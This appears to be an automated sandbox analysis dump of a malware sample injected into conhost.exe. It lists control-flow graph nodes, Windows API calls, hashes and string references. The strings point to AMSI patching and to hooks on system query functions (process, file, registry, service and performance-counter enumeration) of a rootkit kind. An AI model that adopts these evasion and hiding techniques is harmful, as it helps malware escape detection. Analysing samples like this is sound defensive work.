1b44490d1f4 __std_exception_copy 13 API calls 8683->8684 8686 1b4449106ee 8684->8686 8687 1b44490d04c _invalid_parameter_noinfo 38 API calls 8686->8687 8687->8685 8163 1b4449063e3 8164 1b4449063f0 8163->8164 8165 1b4449063fc GetThreadContext 8164->8165 8172 1b44490655a 8164->8172 8166 1b444906422 8165->8166 8165->8172 8171 1b444906449 8166->8171 8166->8172 8167 1b44490663e 8169 1b44490665e 8167->8169 8181 1b444904b20 8167->8181 8168 1b444906581 VirtualProtect FlushInstructionCache 8168->8172 8185 1b444905530 GetCurrentProcess 8169->8185 8173 1b4449064cd 8171->8173 8175 1b4449064a6 SetThreadContext 8171->8175 8172->8167 8172->8168 8175->8173 8176 1b4449066b7 8179 1b444908070 _invalid_parameter_noinfo 8 API calls 8176->8179 8177 1b444906677 ResumeThread 8178 1b444906663 8177->8178 8178->8176 8178->8177 8180 1b4449066ff 8179->8180 8183 1b444904b3c 8181->8183 8182 1b444904b9f 8182->8169 8183->8182 8184 1b444904b52 VirtualFree 8183->8184 8184->8183 8186 1b44490554c 8185->8186 8187 1b444905562 VirtualProtect FlushInstructionCache 8186->8187 8188 1b444905593 8186->8188 8187->8186 8188->8178 8189 1b44490820c 8196 1b444908f34 8189->8196 8192 1b444908219 8197 1b444909340 _CreateFrameInfo 9 API calls 8196->8197 8198 1b444908215 8197->8198 8198->8192 8199 1b44490c288 8198->8199 8200 1b44490cb10 __std_exception_copy 13 API calls 8199->8200 8201 1b444908222 8200->8201 8201->8192 8202 1b444908f48 8201->8202 8205 1b4449092dc 8202->8205 8204 1b444908f51 8204->8192 8206 1b444909302 8205->8206 8207 1b4449092ed 8205->8207 8206->8204 8208 1b444909c8c _CreateFrameInfo 6 API calls 8207->8208 8209 1b4449092f2 8208->8209 8211 1b444909cd4 8209->8211 8212 1b444909aac __vcrt_InitializeCriticalSectionEx 5 API calls 8211->8212 8213 1b444909d02 8212->8213 8214 1b444909d14 TlsSetValue 8213->8214 8215 1b444909d0c 8213->8215 8214->8215 8215->8206 8688 1b444908f0c 8695 1b44490946c 8688->8695 8691 1b444908f19 8696 1b444909474 8695->8696 8698 1b4449094a5 8696->8698 8700 1b444908f15 8696->8700 8712 1b444909d28 8696->8712 8699 1b4449094b4 __vcrt_uninitialize_locks DeleteCriticalSection 8698->8699 8699->8700 8700->8691 8701 1b444909400 8700->8701 8717 1b444909bfc 8701->8717 8713 1b444909aac __vcrt_InitializeCriticalSectionEx 5 API calls 8712->8713 8714 1b444909d5e 8713->8714 8715 1b444909d68 8714->8715 8716 1b444909d73 InitializeCriticalSectionAndSpinCount 8714->8716 8715->8696 8716->8715 8718 1b444909aac __vcrt_InitializeCriticalSectionEx 5 API calls 8717->8718 8719 1b444909c21 TlsAlloc 8718->8719 9098 1b444905c8d 9099 1b444905c94 9098->9099 9100 1b444905cfb 9099->9100 9101 1b444905d77 VirtualProtect 9099->9101 9102 1b444905db1 9101->9102 9103 1b444905da3 GetLastError 9101->9103 9103->9102 8216 1b444914611 __scrt_dllmain_exception_filter 8721 1b44490c510 8722 1b44490c518 8721->8722 8723 1b44490c545 8722->8723 8725 1b44490c574 8722->8725 8726 1b44490c59f 8725->8726 8727 1b44490c582 DeleteCriticalSection 8726->8727 8728 1b44490c5a3 8726->8728 8727->8726 8728->8723 8489 1b444905974 8490 1b44490597a 8489->8490 8501 1b444907fa0 8490->8501 8494 1b4449059de 8496 1b444905bfd 8498 1b444905cfb 8496->8498 8499 1b444905d77 VirtualProtect 8496->8499 8497 1b444905a77 8497->8494 8497->8496 8514 1b444907b80 8497->8514 8499->8494 8500 1b444905da3 GetLastError 8499->8500 8500->8494 8504 1b444907fab 8501->8504 8502 1b4449059bd 8502->8494 8510 1b444904400 8502->8510 8503 1b44490b470 _invalid_parameter_noinfo 2 API calls 8503->8504 8504->8502 8504->8503 8505 1b444907fca 8504->8505 8506 1b444907fd5 8505->8506 8520 1b4449087b8 8505->8520 8524 1b4449087d8 8506->8524 8511 1b44490441d 8510->8511 8513 1b44490448c 8511->8513 8533 1b444904670 8511->8533 8513->8497 8515 1b444907bc7 8514->8515 8558 1b444907950 8515->8558 8518 1b444908070 _invalid_parameter_noinfo 8 API calls 8519 1b444907bf1 8518->8519 8519->8497 8521 1b4449087c6 std::bad_alloc::bad_alloc 8520->8521 8528 1b444909178 8521->8528 8523 1b4449087d7 8525 1b4449087e6 std::bad_alloc::bad_alloc 8524->8525 8526 1b444909178 Concurrency::cancel_current_task 2 API calls 8525->8526 8527 1b444907fdb 8526->8527 8529 1b444909197 8528->8529 8530 1b4449091c0 RtlPcToFileHeader 8529->8530 8531 1b4449091e2 RaiseException 8529->8531 8532 1b4449091d8 8530->8532 8531->8523 8532->8531 8534 1b444904694 8533->8534 8535 1b4449046b7 8533->8535 8534->8535 8547 1b444904120 8534->8547 8536 1b4449046ed 8535->8536 8553 1b444904250 8535->8553 8537 1b44490471d 8536->8537 8541 1b444904250 2 API calls 8536->8541 8539 1b444904753 8537->8539 8543 1b444904120 3 API calls 8537->8543 8542 1b44490476f 8539->8542 8544 1b444904120 3 API calls 8539->8544 8541->8537 8545 1b44490478b 8542->8545 8546 1b444904250 2 API calls 8542->8546 8543->8539 8544->8542 8545->8513 8546->8545 8552 1b444904141 8547->8552 8548 1b4449041b0 8548->8535 8549 1b444904196 VirtualQuery 8549->8548 8549->8552 8550 1b4449041ca VirtualAlloc 8550->8548 8551 1b4449041fb GetLastError 8550->8551 8551->8548 8551->8552 8552->8548 8552->8549 8552->8550 8557 1b444904268 8553->8557 8554 1b4449042d7 8554->8536 8555 1b4449042bd VirtualQuery 8555->8554 8555->8557 8556 1b444904322 GetLastError 8556->8557 8557->8554 8557->8555 8557->8556 8559 1b44490796b 8558->8559 8560 1b44490798f 8559->8560 8561 1b444907981 SetLastError 8559->8561 8560->8518 8561->8560 8729 1b4449146f5 8730 1b444909324 _CreateFrameInfo 9 API calls 8729->8730 8731 1b44491470d 8730->8731 8732 1b444909324 _CreateFrameInfo 9 API calls 8731->8732 8733 1b444914728 8732->8733 8734 1b444909324 _CreateFrameInfo 9 API calls 8733->8734 8735 1b44491473c 8734->8735 8736 1b444909324 _CreateFrameInfo 9 API calls 8735->8736 8737 1b44491477e 8736->8737 8217 1b444905ff9 8218 1b444906000 VirtualProtect 8217->8218 8219 1b444906029 GetLastError 8218->8219 8220 1b444905f10 8218->8220 8219->8220 8221 1b4449041f9 8226 1b444904146 8221->8226 8222 1b4449041b0 8223 1b444904196 VirtualQuery 8223->8222 8223->8226 8224 1b4449041ca VirtualAlloc 8224->8222 8225 1b4449041fb GetLastError 8224->8225 8225->8222 8225->8226 8226->8222 8226->8223 8226->8224 8227 1b44490cbfc 8232 1b44490f3a0 8227->8232 8229 1b44490cc05 8230 1b44490cb10 __std_exception_copy 13 API calls 8229->8230 8231 1b44490cc22 __vcrt_uninitialize_ptd 8229->8231 8230->8231 8233 1b44490f3b5 8232->8233 8234 1b44490f3b1 8232->8234 8233->8234 8235 1b44490ef88 9 API calls 8233->8235 8234->8229 8235->8234 9104 1b44491387c 9105 1b4449138b4 __GSHandlerCheckCommon 9104->9105 9106 1b4449138e0 9105->9106 9108 1b444909a24 9105->9108 9109 1b444909324 _CreateFrameInfo 9 API calls 9108->9109 9110 1b444909a4e 9109->9110 9111 1b444909324 _CreateFrameInfo 9 API calls 9110->9111 9112 1b444909a5b 9111->9112 9113 1b444909324 _CreateFrameInfo 9 API calls 9112->9113 9114 1b444909a64 9113->9114 9114->9106 8562 1b44490c180 8565 1b44490bf38 8562->8565 8572 1b44490bf00 8565->8572 8570 1b44490bebc 13 API calls 8571 1b44490bf6b 8570->8571 8573 1b44490bf15 8572->8573 8574 1b44490bf10 8572->8574 8576 1b44490bf1c 8573->8576 8575 1b44490bebc 13 API calls 8574->8575 8575->8573 8577 1b44490bf2c 8576->8577 8578 1b44490bf31 8576->8578 8579 1b44490bebc 13 API calls 8577->8579 8578->8570 8579->8578 8738 1b44490b500 8743 1b44490c558 EnterCriticalSection 8738->8743 8744 1b444902300 8745 1b444902331 8744->8745 8746 1b444902412 8745->8746 8747 1b444902447 8745->8747 8753 1b444902355 8745->8753 8748 1b4449024bb 8747->8748 8749 1b44490244c 8747->8749 8748->8746 8752 1b4449035c8 11 API calls 8748->8752 8761 1b4449035c8 GetProcessHeap HeapAlloc 8749->8761 8751 1b44490238d StrCmpNIW 8751->8753 8752->8746 8753->8746 8753->8751 8755 1b444901d30 8753->8755 8756 1b444901db4 8755->8756 8757 1b444901d57 GetProcessHeap HeapAlloc 8755->8757 8756->8753 8757->8756 8758 1b444901d92 8757->8758 8759 1b444901cfc 2 API calls 8758->8759 8760 1b444901d9a GetProcessHeap HeapFree 8759->8760 8760->8756 8765 1b44490361b 8761->8765 8762 1b4449036d9 GetProcessHeap HeapFree 8762->8746 8763 1b4449036d4 8763->8762 8764 1b444903666 StrCmpNIW 8764->8765 8765->8762 8765->8763 8765->8764 8766 1b444901d30 6 API calls 8765->8766 8766->8765 8236 1b44490c828 8237 1b44490c842 8236->8237 8238 1b44490c82d 8236->8238 8242 1b44490c848 8238->8242 8243 1b44490c892 8242->8243 8244 1b44490c88a 8242->8244 8246 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8243->8246 8245 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8244->8245 8245->8243 8247 1b44490c89f 8246->8247 8248 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8247->8248 8249 1b44490c8ac 8248->8249 8250 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8249->8250 8251 1b44490c8b9 8250->8251 8252 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8251->8252 8253 1b44490c8c6 8252->8253 8254 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8253->8254 8255 1b44490c8d3 8254->8255 8256 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8255->8256 8257 1b44490c8e0 8256->8257 8258 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8257->8258 8259 1b44490c8ed 8258->8259 8260 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8259->8260 8261 1b44490c8fd 8260->8261 8262 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8261->8262 8263 1b44490c90d 8262->8263 8268 1b44490c6f8 8263->8268 8282 1b44490c558 EnterCriticalSection 8268->8282 8580 1b4449033a8 8581 1b4449033cf 8580->8581 8582 1b44490349c 8581->8582 8583 1b4449033ec PdhGetCounterInfoW 8581->8583 8583->8582 8584 1b44490340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8583->8584 8585 1b444903488 GetProcessHeap HeapFree 8584->8585 8586 1b444903440 StrCmpW 8584->8586 8585->8582 8586->8585 8587 1b444903455 8586->8587 8587->8585 8589 1b444903950 StrCmpNW 8587->8589 8590 1b4449039f2 8589->8590 8591 1b444903982 StrStrW 8589->8591 8590->8587 8591->8590 8592 1b44490399b StrToIntW 8591->8592 8592->8590 8593 1b4449039c3 8592->8593 8593->8590 8599 1b444901a30 OpenProcess 8593->8599 8596 1b444903f88 StrCmpNIW 8597 1b4449039e4 8596->8597 8597->8590 8605 1b444901cfc 8597->8605 8600 1b444901a64 K32GetModuleFileNameExW 8599->8600 8601 1b444901ab6 8599->8601 8602 1b444901aad CloseHandle 8600->8602 8603 1b444901a7e PathFindFileNameW lstrlenW 8600->8603 8601->8590 8601->8596 8602->8601 8603->8602 8604 1b444901a9c StrCpyW 8603->8604 8604->8602 8606 1b444901d13 8605->8606 8608 1b444901d1c 8605->8608 8607 1b444901530 2 API calls 8606->8607 8607->8608 8608->8590 8609 1b444910fa8 8610 1b444910fcc 8609->8610 8611 1b444908070 _invalid_parameter_noinfo 8 API calls 8610->8611 8612 1b44491100e 8611->8612 9123 1b44490aaac 9124 1b44490aad9 __except_validate_context_record 9123->9124 9125 1b444909324 _CreateFrameInfo 9 API calls 9124->9125 9126 1b44490aade 9125->9126 9128 1b44490ab38 9126->9128 9131 1b44490abc6 9126->9131 9138 1b44490ab8c 9126->9138 9127 1b44490ac34 9127->9138 9165 1b44490a22c 9127->9165 9129 1b44490abb3 9128->9129 9137 1b44490ab5a __GetCurrentState 9128->9137 9128->9138 9152 1b4449095d0 9129->9152 9134 1b44490abe5 9131->9134 9159 1b4449099cc 9131->9159 9134->9127 9134->9138 9162 1b4449099e0 9134->9162 9135 1b44490acdd 9137->9135 9140 1b44490afb8 9137->9140 9141 1b4449099cc Is_bad_exception_allowed 9 API calls 9140->9141 9142 1b44490afe7 __GetCurrentState 9141->9142 9143 1b444909324 _CreateFrameInfo 9 API calls 9142->9143 9150 1b44490b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9143->9150 9144 1b44490b0fb 9145 1b444909324 _CreateFrameInfo 9 API calls 9144->9145 9146 1b44490b100 9145->9146 9147 1b444909324 _CreateFrameInfo 9 API calls 9146->9147 9148 1b44490b10b __FrameHandler3::GetHandlerSearchState 9146->9148 9147->9148 9148->9138 9149 1b4449099cc 9 API calls Is_bad_exception_allowed 9149->9150 9150->9144 9150->9148 9150->9149 9151 1b4449099f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9150->9151 9151->9150 9222 1b444909634 9152->9222 9154 1b4449095ef __FrameHandler3::GetHandlerSearchState 9226 1b444909540 9154->9226 9157 1b44490afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9158 1b444909624 9157->9158 9158->9138 9160 1b444909324 _CreateFrameInfo 9 API calls 9159->9160 9161 1b4449099d5 9160->9161 9161->9134 9163 1b444909324 _CreateFrameInfo 9 API calls 9162->9163 9164 1b4449099e9 9163->9164 9164->9127 9230 1b44490b144 9165->9230 9167 1b44490a6f4 9168 1b44490a373 9169 1b44490a645 9168->9169 9213 1b44490a3ab 9168->9213 9169->9167 9170 1b44490a643 9169->9170 9283 1b44490a6fc 9169->9283 9172 1b444909324 _CreateFrameInfo 9 API calls 9170->9172 9176 1b44490a687 9172->9176 9173 1b44490a575 9173->9170 9179 1b44490a592 9173->9179 9182 1b4449099cc Is_bad_exception_allowed 9 API calls 9173->9182 9174 1b444909324 _CreateFrameInfo 9 API calls 9177 1b44490a2da 9174->9177 9176->9167 9178 1b444908070 _invalid_parameter_noinfo 8 API calls 9176->9178 9177->9176 9180 1b444909324 _CreateFrameInfo 9 API calls 9177->9180 9181 1b44490a69a 9178->9181 9179->9170 9185 1b44490a5b4 9179->9185 9276 1b4449095a4 9179->9276 9184 1b44490a2ea 9180->9184 9181->9138 9182->9179 9186 1b444909324 _CreateFrameInfo 9 API calls 9184->9186 9185->9170 9187 1b44490a6d7 9185->9187 9188 1b44490a5ca 9185->9188 9189 1b44490a2f3 9186->9189 9191 1b444909324 _CreateFrameInfo 9 API calls 9187->9191 9190 1b44490a5d5 9188->9190 9193 1b4449099cc Is_bad_exception_allowed 9 API calls 9188->9193 9241 1b444909a0c 9189->9241 9197 1b44490b1dc 9 API calls 9190->9197 9194 1b44490a6dd 9191->9194 9193->9190 9196 1b444909324 _CreateFrameInfo 9 API calls 9194->9196 9198 1b44490a6e6 9196->9198 9199 1b44490a5eb 9197->9199 9201 1b44490c2f4 14 API calls 9198->9201 9199->9170 9203 1b444909634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9199->9203 9200 1b444909324 _CreateFrameInfo 9 API calls 9202 1b44490a335 9200->9202 9201->9167 9202->9168 9205 1b444909324 _CreateFrameInfo 9 API calls 9202->9205 9204 1b44490a605 9203->9204 9280 1b444909838 RtlUnwindEx 9204->9280 9207 1b44490a341 9205->9207 9209 1b444909324 _CreateFrameInfo 9 API calls 9207->9209 9208 1b4449099e0 9 API calls 9208->9213 9210 1b44490a34a 9209->9210 9244 1b44490b1dc 9210->9244 9213->9173 9213->9208 9255 1b44490a96c 9213->9255 9269 1b44490a158 9213->9269 9216 1b44490a35e 9251 1b44490b2cc 9216->9251 9218 1b44490c2f4 14 API calls 9218->9187 9219 1b44490a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9220 1b444909178 Concurrency::cancel_current_task 2 API calls 9219->9220 9221 1b44490a6d1 9219->9221 9220->9221 9221->9218 9224 1b444909662 __FrameHandler3::GetHandlerSearchState 9222->9224 9223 1b44490968c RtlLookupFunctionEntry 9223->9224 9224->9223 9225 1b4449096d4 9224->9225 9225->9154 9228 1b44490958b 9226->9228 9229 1b444909560 9226->9229 9227 1b444909324 _CreateFrameInfo 9 API calls 9227->9229 9228->9157 9229->9227 9229->9228 9231 1b44490b169 __FrameHandler3::GetHandlerSearchState 9230->9231 9232 1b444909634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9231->9232 9233 1b44490b17e 9232->9233 9295 1b444909db4 9233->9295 9236 1b44490b190 __FrameHandler3::GetHandlerSearchState 9298 1b444909dec 9236->9298 9237 1b44490b1b3 9238 1b444909db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9237->9238 9239 1b44490a28e 9238->9239 9239->9167 9239->9168 9239->9174 9242 1b444909324 _CreateFrameInfo 9 API calls 9241->9242 9243 1b444909a1a 9242->9243 9243->9167 9243->9200 9245 1b44490b2c3 9244->9245 9248 1b44490b207 9244->9248 9246 1b44490a35a 9246->9168 9246->9216 9247 1b4449099e0 9 API calls 9247->9248 9248->9246 9248->9247 9249 1b4449099cc Is_bad_exception_allowed 9 API calls 9248->9249 9250 1b44490a96c 9 API calls 9248->9250 9249->9248 9250->9248 9252 1b44490b339 9251->9252 9254 1b44490b2e9 Is_bad_exception_allowed 9251->9254 9252->9219 9253 1b4449099cc 9 API calls Is_bad_exception_allowed 9253->9254 9254->9252 9254->9253 9256 1b44490aa28 9255->9256 9257 1b44490a999 9255->9257 9256->9213 9258 1b4449099cc Is_bad_exception_allowed 9 API calls 9257->9258 9259 1b44490a9a2 9258->9259 9259->9256 9260 1b4449099cc Is_bad_exception_allowed 9 API calls 9259->9260 9261 1b44490a9bb 9259->9261 9260->9261 9261->9256 9262 1b44490a9e7 9261->9262 9263 1b4449099cc Is_bad_exception_allowed 9 API calls 9261->9263 9264 1b4449099e0 9 API calls 9262->9264 9263->9262 9265 1b44490a9fb 9264->9265 9265->9256 9266 1b44490aa14 9265->9266 9267 1b4449099cc Is_bad_exception_allowed 9 API calls 9265->9267 9268 1b4449099e0 9 API calls 9266->9268 9267->9266 9268->9256 9270 1b444909634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9269->9270 9271 1b44490a195 9270->9271 9272 1b4449099cc Is_bad_exception_allowed 9 API calls 9271->9272 9273 1b44490a1cd 9272->9273 9274 1b444909838 9 API calls 9273->9274 9275 1b44490a211 9274->9275 9275->9213 9277 1b4449095b8 __FrameHandler3::GetHandlerSearchState 9276->9277 9278 1b444909540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9277->9278 9279 1b4449095c2 9278->9279 9279->9185 9281 1b444908070 _invalid_parameter_noinfo 8 API calls 9280->9281 9282 1b444909932 9281->9282 9282->9170 9284 1b44490a735 9283->9284 9289 1b44490a948 9283->9289 9285 1b444909324 _CreateFrameInfo 9 API calls 9284->9285 9286 1b44490a73a 9285->9286 9287 1b44490a759 EncodePointer 9286->9287 9292 1b44490a7ac 9286->9292 9288 1b444909324 _CreateFrameInfo 9 API calls 9287->9288 9290 1b44490a769 9288->9290 9289->9170 9290->9292 9301 1b4449094ec 9290->9301 9292->9289 9293 1b44490a158 19 API calls 9292->9293 9294 1b4449099cc 9 API calls Is_bad_exception_allowed 9292->9294 9293->9292 9294->9292 9296 1b444909634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9295->9296 9297 1b444909dc7 9296->9297 9297->9236 9297->9237 9299 1b444909634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9298->9299 9300 1b444909e06 9299->9300 9300->9239 9302 1b444909324 _CreateFrameInfo 9 API calls 9301->9302 9303 1b444909518 9302->9303 9303->9292 8284 1b444906430 8285 1b44490643d 8284->8285 8286 1b444906449 8285->8286 8288 1b44490655a 8285->8288 8287 1b4449064cd 8286->8287 8289 1b4449064a6 SetThreadContext 8286->8289 8290 1b44490663e 8288->8290 8291 1b444906581 VirtualProtect FlushInstructionCache 8288->8291 8289->8287 8292 1b44490665e 8290->8292 8294 1b444904b20 VirtualFree 8290->8294 8291->8288 8293 1b444905530 3 API calls 8292->8293 8297 1b444906663 8293->8297 8294->8292 8295 1b4449066b7 8298 1b444908070 _invalid_parameter_noinfo 8 API calls 8295->8298 8296 1b444906677 ResumeThread 8296->8297 8297->8295 8297->8296 8299 1b4449066ff 8298->8299 8300 1b44490ec30 GetCommandLineA GetCommandLineW 8301 1b44490c218 8302 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8301->8302 8303 1b44490c228 8302->8303 8304 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8303->8304 8305 1b44490c23c 8304->8305 8306 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8305->8306 8307 1b44490c250 8306->8307 8308 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8307->8308 8309 1b44490c264 8308->8309 8770 1b444902518 GetProcessIdOfThread GetCurrentProcessId 8771 1b4449025be 8770->8771 8772 1b444902543 CreateFileW 8770->8772 8772->8771 8773 1b444902577 WriteFile ReadFile CloseHandle 8772->8773 8773->8771 8613 1b444911398 8614 1b4449113ae 8613->8614 8615 1b4449113f5 8614->8615 8617 1b44491140e 8614->8617 8616 1b44490d1f4 __std_exception_copy 13 API calls 8615->8616 8618 1b4449113fa 8616->8618 8620 1b44490dd78 14 API calls 8617->8620 8621 1b444911405 8617->8621 8619 1b44490d04c _invalid_parameter_noinfo 38 API calls 8618->8619 8619->8621 8620->8621 8622 1b44491479d 8625 1b44490af34 8622->8625 8626 1b44490af4e 8625->8626 8628 1b44490af9b 8625->8628 8627 1b444909324 _CreateFrameInfo 9 API calls 8626->8627 8626->8628 8627->8628 8774 1b444904320 8777 1b44490426d 8774->8777 8775 1b4449042bd VirtualQuery 8776 1b4449042d7 8775->8776 8775->8777 8777->8775 8777->8776 8778 1b444904322 GetLastError 8777->8778 8778->8777 8310 1b44490f820 8313 1b44490f7d8 8310->8313 8318 1b44490c558 EnterCriticalSection 8313->8318 8319 1b44490fe20 8320 1b44490fe4a 8319->8320 8321 1b44490d220 _invalid_parameter_noinfo 13 API calls 8320->8321 8322 1b44490fe6a 8321->8322 8323 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8322->8323 8324 1b44490fe78 8323->8324 8325 1b44490fea2 8324->8325 8326 1b44490d220 _invalid_parameter_noinfo 13 API calls 8324->8326 8327 1b44490fec1 InitializeCriticalSectionEx 8325->8327 8330 1b44490feab 8325->8330 8328 1b44490fe94 8326->8328 8327->8325 8329 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8328->8329 8329->8325

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProcSleep
                                  • String ID: AmsiScanBuffer$amsi.dll
                                  • API String ID: 188063004-3248079830
                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction ID: cc1092c618083c93708768dc689d5ce69951447389d3c8ede5c818316b15fcd5
                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction Fuzzy Hash: 3CD06730A12640D7FA496F71E8D57D83271AB64F53FC58415C50E022A2DF2D8979A340

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                  • API String ID: 1735320900-4225371247
                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction ID: 463b54c64855c35cda9f5badf29bf51cd3b3585f437fe171f7aa81b0ed911ff7
                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction Fuzzy Hash: 83516A78514A4AA7FB09EFB8E8C67D4B331B744756F80C923940906567DF388A7AE380

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameW.KERNEL32 ref: 000001B444903A35
                                  • PathFindFileNameW.SHLWAPI ref: 000001B444903A44
                                    • Part of subcall function 000001B444903F88: StrCmpNIW.SHLWAPI(?,?,?,000001B44490272F), ref: 000001B444903FA0
                                    • Part of subcall function 000001B444903EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903EDB
                                    • Part of subcall function 000001B444903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F0E
                                    • Part of subcall function 000001B444903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F2E
                                    • Part of subcall function 000001B444903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F47
                                    • Part of subcall function 000001B444903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F68
                                  • CreateThread.KERNELBASE ref: 000001B444903A8B
                                    • Part of subcall function 000001B444901E74: GetCurrentThread.KERNEL32 ref: 000001B444901E7F
                                    • Part of subcall function 000001B444901E74: CreateThread.KERNELBASE ref: 000001B444902043
                                    • Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902049
                                    • Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902055
                                    • Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902061
                                    • Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B44490206D
                                    • Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902079
                                    • Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902085
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                  • String ID:
                                  • API String ID: 2779030803-0
                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                  • Instruction ID: 4354f403c46ac883cb633c1936d3708a9b2e12e53e6e58379288aa84facc5a44
                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                  • Instruction Fuzzy Hash: 92117C35620A0187FBB0EB70A5CA7ED73B0B794356F90C12A9406815D3EF7DC478A600
                                  APIs
                                  Memory Dump Source
